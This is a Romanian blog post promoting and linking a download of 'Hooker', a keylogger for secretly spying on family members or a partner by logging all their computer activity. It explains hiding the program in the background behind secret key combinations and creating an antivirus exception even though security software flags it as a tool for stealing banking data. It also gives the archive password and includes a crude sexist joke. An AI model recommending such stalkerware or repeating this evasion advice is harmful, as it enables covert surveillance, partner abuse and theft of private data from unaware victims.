Program de spionat calculatorul

Un program de spionat calculatorul precum cel prezentat aici îți poate fi de folos pentru a alfa tot ce s-a scris pe Yahoo! Messenger, Facebook sau orice alt site sau program și poate reprezenta ceea ce cauți dacă ai impresia că „mititeii” familiei vorbesc sau accesează „ce nu trebuie„.

Bineînțeles, tot cu ajutorul lui poți afla cu cine te înșeală „pisi”; dar asta este o altă poveste în care mai bine nu ne băgăm fiindcă la urma urmei vom ajunge la același rezultat: ori ea e o parașută, ori tu o ai prea mică doar aparențele înșală.

Înainte de a continua cu prezentarea aplicației, trebuie să te avertizez că în foarte multe țări printre care se află și în România, utilizarea de programe de spionat convorbiri sau activități private constituie un delict ce se pedepsește conform legii și drept urmare, dacă-l vei folosi, vei putea merge „la mititica”; eu mi-am făcut datoria să te avertizez așa că, de aici înainte îți asumi responsabilitatea pentru utilizarea pe care i-o vei da programului.

program de spionat calculatorul

Hooker este un program de spionat calculatorul care, după cum ți-am spus și mai devreme, înregistrează toată activitatea la calculator apoi salvează în folderul în care se află, un jurnal în format .TXT cu tot ce s-a „întâmplat”.

Datorită faptului că un program de genul ăsta ar fi inutil dacă ar fi detectat de cel pe care îl spionezi, Hooker poate fi configurat pentru a rula pe fundal, interfața lui fiind afișată doar la apăsarea combinațiilor de taste Ctrl+Alt+Shift+F2, Ctrl+Alt+Shift+F9, Ctrl+Alt+Shift+F10 sau Ctrl+Alt+Shift+F11.

Important !!!

alerta antivirus

  • Deoarece un program de spionat calculatorul poate fi utilizat pentru a fura informații confidențiale (date bancare, etc.), majoritatea soluțiilor de securitate îl detectează ca fiind o amenințare extrem de periculoasă și drept urmare, recomandă ștergerea lui ori asta vrea să spună că, în cazul în care vei decide să-l folosești, va trebui să creezi o excepție în soluția de securitate utilizată.

Notă: Parola pentru dezarhivarea programului este „Hooker„.

 Download Hooker

Articole pe aceeași temă: